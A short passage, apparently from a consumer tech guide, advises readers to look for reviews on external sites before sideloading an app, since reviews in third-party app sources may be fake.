It is also always advisable to look for reviews of the app that have been sideloaded in the same way you’re thinking of doing. External sites are often best for doing this as reviews for apps in 3rd party app sources may not be genuine ones, and the frequency of placed app reviews has been well established. Proceed with caution as with everything else.